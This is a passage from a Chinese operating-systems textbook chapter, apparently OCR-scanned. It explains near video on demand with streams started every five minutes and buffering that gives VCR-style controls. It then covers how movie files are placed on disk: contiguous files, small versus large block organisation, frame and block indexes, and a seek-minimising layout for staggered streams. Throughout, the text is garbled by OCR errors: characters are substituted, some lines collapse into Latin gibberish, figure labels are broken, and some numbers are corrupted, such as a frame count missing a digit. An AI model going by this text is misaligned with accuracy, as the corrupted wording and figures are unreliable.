改 ， 就 可 能 获得 巨大 的 性 能 改进 。 视 频 点 播 面 临 的 问题 是 用 户 可 能 在 
任意 时 刻 开 始 观看 一 部 电影 ， 所 以 ， 如 果 有 100 个 用 户 全 部 在 晚 8 点 左 
右 开始 观看 某 个 新 电影 ， 很 可 能 不 会 有 两 个 用 户 在 完全 相同 的 时 刻 开 
始 ， 所 以 他 们 无 法 共享 一 个 数据 流 。 使 优化 成 为 可 能 的 修改 是 ， 通 知 
所 有 用 户 电影 只 在 整 氮 和 随后 每 隔 (例如 ) 5 分 钟 开始 。 因 此 ， 如 果 一 
个 用 户 想 在 8:02 看 一 部 电影 ， 那 么 他 必须 等 到 8:05。 


这 样 做 的 收益 是 ， 不 管 存 在 多 少 客户 ， 对 于 一 部 2 小 时 的 电影 ， 只 
需要 24 个 数据 流 。 如 图 7-17 所 示 ， 第 一 个 数据 流 开始 于 8:00。 在 8:05， 
当 第 一 个 数据 流 处 于 第 9000 帧 时 ， 第 二 个 数据 流 开始 。 在 8:10， 当 第 一 
个 数据 流 处 于 第 18 000 帧 并 且 第 二 个 数据 流 处 于 第 9000 帧 时 ， 第 三 个 数 
据 流 开始 ， 以 此 类 推 直到 第 24 个 数据 流 开始 于 9:55。 在 10:00， 第 一 个 
数据 流 终止 并 且 再 一 次 从 第 0 帧 开始 。 这 一 方案 称 为 近似 视频 点 播 

(near video on demand) ， 因 为 视频 并 不 是 完全 随 着 点 播 而 开始 ， 而 是 
在 点 播 之 后 不 久 开 始 。 


数据 流 
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时 间 一 一 > 
图 7-17 近似 视频 点 播 以 规则 的 间隔 开始 一 个 新 的 数据 流 ， 在 本 例 中 
时 间 间 隔 为 5 分 钟 (9000W) 


这 里 的 关键 参数 是 多 长 时 间 开始 一 个 数据 流 。 如 果 每 2 分 钟 开 始 一 
个 数据 流 ， 那 么 对 于 一 部 2 小 时 的 电影 来 说 就 需要 60 个 数据 流 ， 但 是 开 
台 观 看 的 最 大 等 待 时 间 是 2 分 钟 。 运 草 商 必须 判定 人 们 愿意 等 竺 多 长 时 
间 ， 因 为 人 们 愿意 等 待 的 时 间 越 长 ， 系 统 效 率 束 越 高 ， 并 且 同 时 能 够 
被 观看 的 电影 就 越 多 。 一 个 替代 的 策略 是 同时 提供 不 用 等 竺 的 选择 
权 ， 在 这 种 情况 下 ， 新 的 数据 流 可 以 立刻 开始 ， 但 是 需要 对 系统 做 更 
多 的 修改 以 文 持 即 时 启动 。 


在 某 种 意义 上 ， 视 频 点 播 如 同 使 用 出 租车 : FR PER ° WEI 
视频 点 播 如 同 使 用 公共 汽车 : 它 有 看 固定 的 时 刻 表 ， 乘 客 必 须 等 竺 下 
一 辆 。 但 是 大 众 交 通 只 有 在 存在 大 众 的 时 候 才 有 意义 。 在 受 哈 顿 中 心 
区 ， 每 5 分 钟 一 辆 的 公共 汽车 加 起 来 至 少 还 可 以 拉 上 一 些 乘客 ， 而 在 怀 
俄 明 州 乡间 公路 上 旅行 的 公共 汽车 ， 可 能 在 所 有 的 时 间 几 乎 都 是 空空 
的 。 类 似 地 ， 播 放 史 蒂 文 * 斯 皮尔 伯 格 的 最 新 大 片 可 能 吸引 足够 多 的 
客 尸 ， 从 而 保证 每 5 分 钟 开始 一 个 新 的 数据 流 ， 但 是 对 于 《乱世 佳人 》 
这 样 的 经 典 影 片 ， 最 好 还 是 位 早 地 在 点 播 的 基础 上 播映 。 


对 于 近似 视频 点 播 ， 用 户 不 具有 VCR 控 制 能 力 。 没 有 用 户 能 够 暂 
停 一 部 电影 而 去 一 趟 厨房 。 他 们 所 能 做 的 最 好 的 事情 不 过 是 当 他 们 从 
厨房 中 返回 时 ， 同 后 退 到 随后 开始 的 一 个 数据 流 ， 从 而 使 漏 过 的 几 分 
钟 资料 重 现 。 


实际 上 ， 近 似 视 频 点 播 还 有 另外 一 个 模型 。 在 这 个 模型 中 ， 人 们 
可 以 在 他 们 需要 的 任意 时 候 预订 电影 ， 而 不 是 预 允 宣布 每 隔 5 分 钟 将 开 
演 某 部 电影 。 每 隔 5 分 钟 ， 系 统 要 查看 哪些 电影 已 经 被 预订 并 且 开 始 这 
些 电影 。 采 用 这 一 方案 时 ， 根 据点 播 的 情况 ， 一 部 电影 可 能 在 8:00、 
8:10、8:15 和 8:25 开 始 ， 但 不 会 在 中 间 的 时 间 开 始 。 结 果 ， 没 有 观众 的 
数据 流 融 不 会 被 传输 ， 蔬 约 了 磁盘 人 带宽、 内存 和 网 络 容 量 。 另 一 方 
面 ， 现 在 到 厨房 去 制作 冰淇淋 束 有 点 冒险 ， 因 为 不 能 保证 在 观众 正在 
观看 的 电影 之 后 5 分 钟 还 有 为 一 个 数据 流 正在 运行 。 当 然 ， 运营 丙 可 以 


给 用 户 提供 一 个 选项 ， 以 便 显 示 所 有 同时 发 生 的 数据 流 的 一 个 列表 ， 
(eA BU on ee AY Le ee FD RAS, AAR BBS 
情 地 欢迎 更 多 的 几 个 按钮 。 


76.3 ”具有 VCR 功 能 的 近似 视频 点 播 


将 近似 视频 点 播 (为 的 是 效率 ) 加 上 每 个 个 体 观众 完全 的 VCR 控 
制 (为 的 是 方便 用 户 ) 是 一 种 理想 的 组 合 。 通 过 对 模型 进行 略微 的 修 
正 ， 这 样 的 设计 是 有 可 能 的 。 下 面 我 们 将 介绍 为 达到 这 一 目标 所 采用 
的 一 种 方法 (Abram-Profeta 和 Shin,1998) ， 我 们 给 出 的 是 略微 简化 了 
的 描述 。 


我 们 将 以 图 7-17 所 示 的 标准 近似 视频 点 播 模 式 为 开端 。 可 是 ， 我 们 
要 增加 要 求 ， 即 要 求 每 个 客户 机 在 本 地 绥 冲 前 AT 分 钟 以 及 即将 来 临 的 
AT 分 钟 。 绥 促 前 AT 分 钟 是 十 分 容易 的 ， 只 要 在 显示 之 后 将 其 保存 下 来 
即 可 。 缓 冲 即将 来 临 的 AT 分 钟 是 比较 困难 的 ， 但 是 如 果 客 户 机 有 一 次 
读 两 个 数据 流 的 能 力也 是 可 以 实现 的 。 


可 以 用 一 个 例子 来 说 明 建 立 缓冲 区 的 一 种 方法 。 如 果 一 个 用 户 在 
8:15 开 始 观看 电影 ， 那 么 客户 机 读 入 并 显示 8:15 的 数据 流 (该 数据 流 正 
处 于 第 0 帧 ) 。 与 此 并 行 ， 客 户 机 读 入 并 保存 8:10 的 数据 流 ， 该 数据 流 
当前 正 处 于 5 分 钟 的 标记 处 〈 也 就 是 第 9000 帧 ) 。 在 8:20 时 ， 第 0 帧 至 第 
17 999 帧 已 经 被 保存 下 来 ， 并 且 用 户 下 面 将 要 看 到 的 应 该 是 第 9000 帧 。 
从 此 刻 开始 ，8:15 的 数据 流 补 放弃， 缓冲 区 用 8:10 的 数据 流 (该 数据 流 
正 处 于 第 18 000 幅 来 填充 ， 而 显示 则 从 缓冲 区 的 中 间 点 (第 9000 帧 ) 
驱动 。 当 每 一 新 的 帧 被 读 入 时 ， 在 缓冲 区 的 终点 处 添加 一 帧 ， 而 在 绥 


冲 区 的 起 点 处 丢弃 一 帧 。 当 前 被 显示 的 帧 称 为 播放 点 (play point) ， 
它 总 是 处 于 缓 神 区 的 中 间 点 。 图 7-18a 所 示 为 电影 播放 到 第 75 分 钟 时 的 
情形 。 此 时 ，70 分 钟 到 80 分 钟 之 间 所 有 的 帧 都 在 缓冲 区 中 。 如 有 果 数 据 
率 是 4 Mbps， 则 10 分 钟 的 缓冲 区 需要 300M 字 市 的 存储 容量 。 以 目前 的 
价格 ， 这 样 的 缓 神 区 肯定 可 以 在 磁盘 中 保持 ， 并 且 在 RAM 中 保持 也 是 

能 的 。 如 果 和 希望 使 用 RAM， 但 是 300M 字 节 又 太 大 ， 那 么 可 以 使 用 小 
一 些 的 缓冲 区 。 
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图 7-18 引 初 始 情 形 ，b) 倒 带 至 12 分 钟 之 后 ;QO 等 待 3 分 钟 之 后 ;dd) 开 
台 重 填充 缓冲 区 之 后 ;的 绥 冲 区 满 


现在 假设 用 户 决 定 要 快 进 或 者 快 倒 。 只 要 播放 点 保持 在 70 到 80 分 
钟 的 范围 之 内 ， 显 示 束 可 以 从 缓冲 区 馈 入 。 然 而 ， 如 果 播 放 点 在 某 个 
方 同 离 开 了 这 一 区 间 ， 我 们 就 过 到 了 问题 。 解 决 方法 是 开局 一 个 私有 
(也 就 是 视频 点 播 ) 数据 流 以 服务 于 用 户 。 沿 着 某 个 方向 快速 运动 可 
以 用 前 面 讨论 过 的 技术 来 处 理 。 


通常 ， 在 某 一 时 刻 用 户 可 能 会 安 下 心 来 决定 再 次 以 正常 速度 观看 
影 。 此 时 ， 我 们 可 以 考虑 将 用 户 迁 移 到 有 某 一 近似 视频 点 播 数据 流 ， 
这 样 私 有 数据 流 束 可 以 被 放弃 。 例 如 ， 假 设 用 户 决 定 返回 到 12 分 钟 标 
号 处 ， 如 图 7-18b 所 示 。 这 一 点 远 远 超出 了 缓冲 区 的 范围 ， 所 以 显示 不 
可 能 从 缓冲 区 馈 入 。 此 外 ， 由 于 切换 A) 发 生 在 第 75 分 钟 ， 系 统 
中 存在 着 正在 显示 电影 第 5、10、15 和 20 分 钟 那 一 帧 的 数据 流 ， 但 是 没 
有 显示 电影 第 12 分 钟 那 一 帧 的 数据 流 。 


解决 方法 是 继续 观看 私有 数据 流 ， 但 是 开始 从 当前 正 播放 电影 第 
15 分 钟 那 一 帧 的 数据 流 填充 缓冲 区 。 经 过 3 分 钟 之 后 的 情形 如 图 7-18c 所 
示 。 播 放 点 现在 是 第 15 分 钟 ， 绥 冲 区 包含 了 15 到 18 分 钟 的 帧 ， 而 近似 
视频 点 播 数据 流 正 处 在 第 8、13、18 和 23 分 钟 。 在 这 一 时 刻 ， 私 有 数据 
流 可 以 被 放弃 ， 显 示 可 以 从 缓冲 区 馈 入 。 绥 冲 区 继续 从 现在 正 处 于 第 
18 分 钟 的 数据 流 填充 。 经 过 男 一 分 钟 之 后 ， 播 放 点 是 第 16 分 钟 ， 缓 冲 
区 包含 了 15 到 19 分 钟 的 帧 ， 并 且 数 据 流 在 第 19 分 钟 处 将 数据 馈 入 缓冲 
区 ， 如 图 7-18d 所 示 。 


ZA ASOT HZ Ja, RAT, FF TRL ETE 2257 o HR 
放 点 不 是 处 于 缓冲 区 的 中 间 点 ， 但 是 如 果 必 要 可 以 进行 这 样 的 整理 。 


7.7 文件 存放 


多 媒体 文件 非 第 庞大 ， 通 第 只 写 一 次 而 读 许多 次 ， 并 且 倾 向 于 被 
顺序 访问 。 它 们 的 回放 还 必须 满足 严格 的 服务 质量 标准 。 总 而 言 之 ， 
这 些 要 求 暗 示 痢 不 同 于 传统 操作 系统 使 用 的 文件 系统 布局 。 我 们 在 下 
面 将 讨论 某 些 这 样 的 问题 ， 首 先 针 对 单个 磁盘 ， 然 后 是 多 个 磁 副 。 


7.7.1 在 单个 磁盘 上 存放 文件 


最 为 重要 的 要 求 是 数据 能 够 以 必要 的 速度 流出 到 网 络 或 输出 设备 
上 ， 并 且 没 有 颤动 。 为 此 ， 在 传输 一 帧 的 过 程 中 有 多 次 寻 道 是 极度 不 
受 欢迎 的 。 在 视频 服务 右上 消除 文件 内 寻 道 的 一 种 方法 十 使 用 连续 的 
文件 。 通 常 ， 使 文件 为 连续 的 工作 做 得 并 不 十 分 好 ， 但 是 在 预先 精 心 
装载 了 电影 的 视频 服务 器 上 它 工 作 得 还 是 不 错 的 ， 因 为 这 些 电影 后 来 
` 会 再 发 生变 化 。 


然而 ， 视 频 、 音 频 和 文本 的 存在 是 一 个 复杂 因素 ， 如 图 7-3 所 示 。 
即使 视频 、 首 频 和 文本 每 个 部 存储 为 单独 的 连续 文件 ， 从 视频 文件 到 
音频 文件 ， 再 从 音频 文件 到 文本 文件 的 寻 道 在 需要 的 时 候 还 是 免不了 
的 。 这 使 人 想起 第 二 种 可 能 的 存储 排列 ， 使 视频 、 音 频 和 文本 交叉 存 
放 ， 但 是 整个 文件 还 古 连 续 的 ， 如 图 7-19 所 示 。 此 处 ， 直 接 跟随 第 1 帧 


视频 的 是 第 1 帧 的 各 种 音频 轨迹 ， 然 后 是 第 1 帧 的 各 种 文本 轨迹 。 根 据 
存在 多 少 音频 和 文本 轨迹 ， 最 简单 的 可 能 是 在 一 次 磁 一 读 操 作 中 读 入 
每 一 帧 的 全 部 内 容 ， 然 后 只 将 需要 的 部 分 传输 给 用 户 。 
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图 7-19 每 部 电影 在 一 个 连续 文件 中 交叉 存放 视频 、 音 频 和 文本 


这 一 组 织 需 要 额外 的 磁盘 WO 读 入 不 必要 的 首 频 和 文本 ， 在 内 存 中 
还 需要 额外 的 缓冲 区 空间 存放 它们 。 可 是 它 消除 了 所 有 的 寻 道 (在 单 
用 户 系 统 上 ) ， 并 且 不 需要 任何 系统 开销 跟踪 哪 一 帧 在 磁盘 上 的 什么 
地 方 ， 因 为 整 部 电影 存放 在 一 个 连续 文件 中 。 以 这 样 的 布局 ， 随 机 访 
问 是 不 可 能 的 ， 但 是 如 有 果 不 需要 随机 访问 ， 这 点 损失 并 不 严重 。 类 似 
地 ， 如 采 没 有 额外 的 数据 结构 和 复杂 性 ， 快 进 和 快 倒 也 二 不 可 能 的 。 


在 具有 多 个 并 发 输出 流 的 视频 服务 右上， 使 整 部 电影 成 为 一 个 连 


续 文 件 的 优点 束 失 去 了 ， 因 为 从 一 部 电影 读 取 一 帧 之 后 ， 磁 副 可 能 不 
得 不 从 许多 其 他 电影 读 入 帧 ， 然 后 才能 返回 到 第 一 部 电影 。 同 样 ， 对 
于 一 部 电影 既 可 以 读 也 可 以 写 的 系统 〈 例 如 用 于 视频 生产 或 编辑 的 系 
统 ) 来 说 ， 使 用 巨大 的 连续 文件 是 很 困难 的 ， 因 而 也 是 没有 用 的 。 


7.7.2 PY HR RE 


这 些 考虑 导致 两 个 针对 多 媒体 文件 的 其 他 文件 存放 组 织 。 第 一 个 
是 小 块 模型 ， 如 图 7-20a 所 示 。 在 这 种 组 织 中 ， 选 定 磁 盘 块 的 大 小 比 帧 
的 平均 大 小 ， 甚 至 是 比 P 帧 和 B 帧 的 大 小 ， 要 小 得 多 。 对 于 每 秒 30 帧 以 4 
Mbps 速 率 传 输 的 MPEG-2 而 言 ， 帧 的 平均 大 小 为 16KB， 所 以 一 个 磁盘 
块 的 大 小 为 1KB 或 2KB 工 作 得 比较 好 。 这 里 的 思想 是 每 部 电影 有 一 个 帧 
索引 ， 这 是 一 个 数据 结构 ， 每 一 帧 有 一 个 帧 索引 项 ， 指 向 帧 的 开始 。 
每 一 帧 本 身 是 一 连 串 连续 的 块 ， 包 含 该 帧 所 有 的 视频 、 音 频 和 文本 轨 
迹 ， 如 图 7-20 中 所 示 。 这 样 ， 读 第 k 帧 时 首先 要 在 帧 索引 中 找到 第 k 个 索 
引 项 ， 然 后 在 一 次 磁盘 操作 中 将 整个 帧 读 入 。 由 于 不 同 的 帧 具有 不 同 
的 大 小 ， 所 以 在 帧 索引 中 需要 有 表示 帧 大 小 的 字段 (以 块 为 单位 ) ， 
即便 对 于 1KB 大 小 的 磁盘 块 ，8 位 的 字段 也 可 以 处 理 最 大 为 255KB 的 
帧 ， 这 对 于 一 个 未 压缩 NTSC 帧 来 说 ， 就 算 它 有 许多 音频 轨迹 也 已 经 足 
IT ° 


存放 电影 的 另 一 个 方法 是 使 用 大 磁盘 块 (比如 256KB) ， 并 且 在 
每 一 块 中 放 入 多 个 帧 ， 如 图 7-20b 所 示 。 这 里 仍然 需要 一 个 索引 ， 但 是 
这 次 不 是 帆 索 引 而 是 块 索 引 。 实 际 上 ， 该 索引 与 独 6-15 中 的 让 点 基本 
相同 ， 只 十 可 能 还 有 额外 的 信息 表明 哪 一 帧 处 于 每 一 块 的 开始 ， 这 样 
就 有 可 能 快速 地 找到 指定 的 帧 。 一 般 而 言 ， 一 个 人 磁盘 块 拥有 的 帧 的 数 


目 不 见 得 是 整数 ， 所 以 需要 做 某 些 机 制 来 处 理 这 一 问题 。 解 决 这 一 问 
题 有 两 种 选择 。 
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图 7-20 不 连续 的 电影 存储 : ay] MEER, DAR RR 


第 一 种 选择 如 网 7-20b 所 示 ， 当 下 一 帆 填 不 满 当 前 位 僵 块 的 时 候 ， 
则 磁盘 块 剩余 的 部 分 就 保持 空 采 状态 。 这 一 当 费 的 空间 就 是 内 部 碎 
片 ， 与 具有 固定 大 小 页 面 的 虚拟 内 存 系统 中 的 内 部 碎片 相同 。 但 是 ， 
这 样 做 在 一 帧 的 中 间 决 不 需要 进行 寻 道 。 


另 一 种 选择 是 填充 每 一 磁 强 块 到 尽头 ， 将 帧 分 裂 开 使 其 跨越 磁 表 
块 。 这 一 选择 在 帧 的 中 间 引 入 寻 道 的 需要 ， 这 将 损害 性 能 ， 但 是 由 于 
消除 了 内 部 碎片 而 节约 了 磁盘 空间 。 


作为 对 比 ， 图 7-20a 中 小 块 的 使 用 也 会 浪费 某 些 人 磁盘 空间 ， 因 为 在 
每 一 帧 的 最 后 一 块 可 能 有 一 小 部 分 未 被 使 用 。 对 于 1KB 的 磁盘 块 和 一 
部 由 216 000 帧 组 成 的 2 小 时 的 NTSC 电 影 ， 浪 费 的 磁盘 空间 总 共 只 有 


WANZN 


3.6GB 中 的 大 约 108KB。 图 7-20b 浪 费 的 磁盘 空间 计算 起 来 非常 困难 ， 但 


是 肯定 多 很 多 ， 因 为 在 一 个 磁盘 块 的 尽头 有 时 会 留 下 100KB 的 空间 ， 
而 下 一 帧 是 一 个 比 它 大 的 项 。 


一 方面 ， 块 索引 比 帧 索引 要 小 很 多 。 对 于 256KB 的 块 ， 如 果 帧 
的 平均 大 小 为 16KB ， 那 么 一 个 块 大约 可 以 装 下 16 个 帧 ， 所 以 一 部 由 
216 000 帧 组 成 的 电影 在 块 索引 中 只 需要 有 13 500 个 索引 项 ， 与 此 相对 
比 ， 对 于 帧 索引 则 需要 216 000 个 索引 项 。 因 为 性 能 的 原因 ， 在 这 两 种 
情形 中 索引 都 应 该 列 出 所 有 的 帧 或 磁盘 块 (也 就 是 说 不 像 UNIX 那 样 有 
间接 块 ) ， 所 以 块 索 引 在 内 存 中 占用 了 13 500 个 8 字 节 的 项 (4 个 字 节 用 
于 人 磁盘 地 址 ，1 个 字 节 用 于 帧 的 大 小 ，3 个 字 节 用 于 起 始 帧 的 帧 号 ) ， 
帧 索引 则 在 内 存 中 占用 了 216 000 个 5 字 节 的 项 (只 有 磁盘 地 址 和 帧 的 大 


小 ) ， 比 较 起 来 ， 当 电影 在 播放 时 ， 块 索引 比 帧 索引 节省 了 接近 1MB 
的 RAM 空 间 。 


这 些 考虑 导出 了 如 下 的 权衡 ; 


DIAS]: 电影 在 播放 时 使 用 大 量 的 RAM; RIRE ° 


2) 块 索引 (SR ik srs ER): RAM 用 量 低 ， 磁盘 浪费 较 


3) 块 索引 (允许 分 裂 帧 跨越 磁盘 块 ) : RAM 用 量 低 ， 无 磁盘 浪 
费 ， 需 要 额外 寻 道 。 


因此 ， 这 里 的 权衡 涉及 回放 时 RAM 的 使 用 量 、 自 始 至 终 浪 费 的 磁 
盘 空 间 以 及 由 于 额外 寻 道 造成 的 回放 时 的 性 能 损失 。 但 是 ， 这 些 问 题 
可 以 用 各 种 方法 来 解决 。 采 用 分 页 操作 在 需要 的 时 候 及 时 将 帧 索引 装 
入 内 存 ， 可 以 减少 RAM 的 使 用 量 。 通 过 足够 的 绥 冲 可 以 屏蔽 在 帧 传输 
过 程 中 的 寻 道 ， 但 是 这 需要 和 额外 的 内 存 并 且 可 能 还 需要 额外 的 复制 操 
作 。 好 的 设计 必须 仔细 分 析 所 有 这 些 因 素 ， 并 且 为 即将 投入 的 应 用 做 
出 民 好 的 选择 。 


这 里 的 为 一 个 因素 是 图 7-20a 中 的 人 磁 副 存储 管理 更 加 复杂 ， 因 为 存 
放 一 帧 需要 找到 大 小 合适 的 一 连 串 连续 的 磁盘 块 。 理 想 情况 下 ， 这 一 
连 串 磁盘 块 不 应 该 跨越 一 个 磁道 的 边界 ， 但 走 通 过 磁头 偶 料 ， 这 一 损 
失 并 不 严重 。 然 而 ， 跨 越 一 个 柱 面 的 边界 则 应 该 避免 。 这 些 要 求 意味 
着 ， 人 磁盘 的 目 由 存储 空间 必须 组 织 成 变 长 孔洞 的 列表 ， 而 不 是 简单 的 
块 列表 或 者 位 图 。 与 此 相对 照 ， 块 列表 或 者 位 图 部 可 以 用 在 图 7-20b 


在 上 述 所 有 情况 下 ， 还 要 说 明 的 是 ， 只 要 可 能 应 该 把 一 部 电影 的 
所 有 块 或 者 帧 放置 在 一 个 狭 罕 鸭 范围 之 内 ， 比 如 说 几 个 柱 面 。 这 样 的 
存放 方式 意味 着 寻 道 可 以 更 快 ， 从 而 留 下 更 多 的 时 间 用 于 其 他 (GEX 
时 ) 活动 ， 或 者 可 以 支持 更 多 的 视频 流 。 这 种 受 约束 的 存放 可 以 通过 
将 磁盘 划分 成 柱 面 组 来 实现 ， 每 个 组 保持 单独 的 空闲 块 列表 或 位 图 。 
如 果 使 用 孔洞 ， 可 能 存在 一 个 1KB 了 筷 洞 的 列表 、 一 个 2KB 和 孔洞 的 列表 、 
一 个 3KB 到 4KB 孔 洞 的 列表 、 一 个 5KB 到 8KB 孔 洞 的 列表 等 。 以 这 种 方 
法 在 一 个 给 定 的 柱 面 组 中 找到 一 个 给 定 大 小 的 孔洞 是 十 分 容易 的 。 


这 两 种 方法 之 间 的 另 一 个 区 别 是 缓冲 。 对 于 小 块 方法 ， 每 次 读 操 
作 正 好 读 取 一 帧 。 因 此 ， 采 用 简单 的 双 缓 冲 策 略 殉 工 作 得 相当 好 : 一 
个 缓冲 区 用 于 回放 当前 帜 ， 男 一 个 用 于 提取 下 一 帧 。 如 果 使 用 固定 大 
小 的 缓冲 区 ， 则 每 个 缓冲 区 必须 足够 大 以 洲 得 下 最 大 可 能 的 I 帧 。 男 一 
方面 ， 如 末 针 对 每 一 帆 从 一 个 池 中 分 配 不 同 的 缓冲 区 ， 并 且 当 帧 在 被 
读 入 之 前 其 大 小 未 知 ， 那 么 对 于 P 帧 和 B 帧 束 可 以 选择 一 个 较 小 的 缓 促 
EE 
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还 可 能 包含 帧 的 片段 (取决 于 选 定 前 面 提 到 的 是 哪 种 选择 ) ， 因 而 需 
要 更 加 复杂 的 策略 。 如 末 显 示 或 传输 巾 时 要 求 它们 是 连续 的 ， 那 么 它 
们 束 必 须 被 复制 ， 但 是 复制 是 一 个 代价 高 昂 的 操作 ， 应 该 尽 可 能 避 
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网 络 上 或 者 送出 到 显示 设备 上 。 
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的 磁盘 块 (每 个 数据 流 ) 稍 大 一 些 的 循环 传输 缓冲 区 。 当 缓冲 区 的 内 
容 低 于 某 个 病 值 时 ， 从 磁 副 读 入 一 个 新 的 大 磁 副 块 ， 将 其 内 容 复 制 到 
传输 缓冲 区 ， 并 且 将 大 位 盘 块 缓冲 区 返还 给 通用 池 “。 循 环 缓冲 区 大 小 
的 选取 必须 使 得 在 它 达到 病 值 和 时， 还 有 空间 能 够 容纳 为 一 个 完整 的 磁 
盘 块 。 因 为 传输 缓冲 区 可 能 要 环绕 ， 所 以 磁盘 读 操作 不 能 直接 达到 传 
输 缓冲 区 。 这 里 复制 和 内 存 的 使 用 量 相 互 之 间 存 在 着 权衡 。 


在 比较 这 两 种 方法 时 ， 还 有 为 一 个 因素 谍 古 磁 副 性 能 。 使 用 大 位 
人 盘 块 时 磁 表 可 以 以 全 速 运转 ， 这 经 音 是 主要 关心 的 事情 。 作 为 单独 的 
单位 读 入 小 的 P 帧 和 B 帆 效率 是 比 较 低 的 。 此 外 ， 将 天 磁 僵 块 分 解 在 多 
个 驱动 器 上 (下 面 将 讨论 ;是 可 能 的 ， 而 将 单独 的 帧 分 解 在 多 个 驱动 
故 上 是 不 可 能 的 。 


图 7-20a 的 小 块 组 织 有 时 称 为 恒定 时 间 长 度 (constant time 
length) ， 因 为 索引 中 的 每 个 指针 代表 着 相同 的 播放 时 间 毫 秒 数 。 相 
反 ， 图 7-20b 的 组 织 有 时 称 为 恒定 数据 长 度 (constant data length) ， 
为 数据 块 的 大 小 相同 。 


两 种 文件 组 织 间 的 另 一 个 区 别 征 ， 如 采 帧 的 类 型 存储 在 图 7-20a 的 
索引 中 ， 那 么 有 可 能 通过 仅仅 显示 项 实现 快 进 。 然 而 ， 根 据 ] 帧 出 现在 
数据 流 中 的 频 度 ， 人 们 可 能 会 察觉 到 播放 的 速率 太 快 或 太 慢 。 在 任何 
情况 下 ， 以 图 7-20b 的 组 织 ， 这 样 的 快 进 都 古 不 可 能 的 。 实 际 上 连续 地 
读 文 件 以 选 出 希望 的 帧 需要 大 量 的 磁盘 MO。 


第 二 种 方法 是 使 用 一 个 特殊 的 文件 给 人 以 10 倍 速度 快 进 的 感觉 ， 

而 这 个 特殊 的 文件 是 以 正常 速度 播放 的 。 这 个 文件 可 以 用 与 其 他 文件 
相同 的 方法 构造 ， 可 以 使 用 帆 索 引 也 可 以 使 用 块 索引 。 打 开 一 个 文件 
的 时 候 ， 如 果 需 要 ， 系 统 必 须 能 够 找到 快 进 文件 。 如 果 用 户 按 下 快 进 
按钮 ， 系 统 必须 立即 找到 并 且 打 开 快 进 文件 ， 然 后 跳 到 文件 中 正确 的 
地 方 。 系 统 所 知道 的 是 当前 所 在 帧 的 帧 号 ， 但 是 它 所 需要 的 是 能 够 在 
快 进 文 件 中 定位 到 相应 的 帧 。 如 末 系 统 当 前 所 在 的 帧 号 是 4816， 并 且 
知道 快 进 文件 是 10 倍 速 ， 那 么 它 必 须 在 快 进 文件 中 定位 到 第 482 帧 并 且 
从 那里 开始 播放 。 


如 果 使 用 了 帧 索引 ， 那 么 定位 一 个 特定 的 帧 是 十 分 容易 的 ， 只 
检索 帧 索引 即 可 。 如 果 使 用 的 是 块 索 3| ， 那 么 每 个 索引 项 中 需要 有 额 
外 的 信息 以 识别 哪 一 帧 在 哪 一 块 中 ， 并 且 必 须 对 块 索引 执行 二 分 搜 
索 。 快 倒 的 工作 方式 与 快 进 相 类 似 。 


7.7.3 ”近似 视频 总 播 的 文件 存放 


到 目前 为 止 我 们 已 经 了 解 了 视频 点 播 的 文件 存放 策略 。 对 于 近似 
视频 点 播 ， 采 用 不 同 的 文件 存放 策略 可 以 获得 更 高 的 效率 。 我 们 还 记 

近似 视频 点 播 将 同一 部 电影 作为 多 个 交错 的 数据 流 送 出 。 即 使 电 
影 是 作为 连续 文件 存放 的 ， 每 个 数据 流 也 需要 进行 寻 道 。Chen 和 
Thapar (1997) 设计 了 一 种 文件 存放 策略 几乎 可 以 消除 全 部 这 样 的 寻 
道 。 图 7-21 说 明了 这 一 方法 的 应 用 ， 图 7-21 中 的 电影 以 每 秒 30 帧 的 速率 
播放 ， 每 隔 5 分 钟 开始 一 个 新 的 数据 流 (参见 图 7-17) 。 根 据 这 些 参 
数 ，2 小 时 长 的 电影 需要 24 个 当前 数据 流 。 


磁盘 块 从 磁盘 读 出 的 顺序 


数据 流 数 据 流  : |:; | : 数据 流 激 据 流 : 
Ei E E h ow 
saat | o Taoa [ns re sn 0 … [207000] 


磁道 2 PT +. [20700 


Ip? 


磁道 3 | | 9002 [78002 [27002] 36002] 45002154002 [63002 [72002] 81002} --- [207002 
第 27 002 帧 〈 大 约 为 电影 的 第 15 分 钟 ) 


图 7-21 针对 近似 视频 点 播 的 优化 帧 存放 策略 


在 这 一 存放 策略 中 ， 由 24 个 帧 组 成 的 由 集合 连 成 一 串 并 且 作 为 一 
个 记录 写 入 磁 列 。 它 们 还 可 以 在 一 个 读 操 作 中 被 读 回 。 考 虑 这 样 一 个 
瞬间 ， 数 据 流 24 恰 好 开始 ， 它 需要 的 是 第 0 帧 ，5 分 钟 前 开始 的 数据 流 
23 需 要 的 是 第 9000 帧 ;数据 流 22 需 要 的 是 第 18 000 帧 ， 以 此 类 推 ， 直 到 
数据 流 0， 它 需要 的 是 第 20 700 帧 。 通 过 将 这 些 帧 连续 地 存放 在 一 个 磁 
道上 ， 视 频 服务 器 只 用 一 次 寻 道 〈 到 第 0 帧 ) 就 可 以 以 相反 的 顺序 满足 
全 部 24 个 数据 流 的 需要 。 当 然 ， 如 果 存 在 某 一 原因 要 以 升序 为 数据 流 
提供 服务 ， 这 些 帧 也 可 以 以 相反 的 顺序 存放 在 磁 强 上 “。 完 成 对 最 后 一 
个 数据 流 的 服务 之 后 ， 磁 强 臂 可 以 移 到 磁道 2 准备 再 次 为 这 些 数 据 流 服 
务 。 这 一 方法 不 要 求 整个 文件 是 连续 的 ， 但 是 对 于 若干 个 同时 的 数据 
流 仍然 给 予 了 民 好 的 性 能 。 


人 简单 的 缓冲 策略 是 使 用 双 绥 冲 。 当 一 个 缓冲 区 正在 向 外 播放 24 个 
数据 流 的 时 候 ， 男 一 个 缓冲 区 正在 预 完 加 载 数 据 。 当 前 操作 结束 时 ， 
两 个 缓冲 区 进行 交换 ， 刚 才 用 于 回放 的 缓冲 区 现在 在 一 个 位 盘 操 作 中 
加 载 数 据 。 


一 个 有 趣 的 问题 是 构造 多 大 的 缓冲 区 。 显 然 ， 它 必须 能 够 凌 下 24 
个 帧 。 然 而 ， 由 于 帧 的 长 度 是 变化 的 ， 选 取 正 确 大 小 的 缓冲 区 并 不 完 
全 是 无 足 轻 重 的 事情 。 使 缓冲 区 大 到 足以 装 下 24 个 1 帧 是 不 必要 的 过 度 
行为 ， 但 是 使 缓冲 区 大 小 为 24 个 平均 帧 则 要 冒 风险 。 


幸运 的 是 ， 对 于 任何 一 部 给 定 的 电影 ， 电 影 中 最 大 的 磁道 (在 图 7- 
21 的 意义 上 说 ) 事先 是 已 知 的 ， 所 以 可 以 选择 缓冲 区 恰好 为 这 一 大 
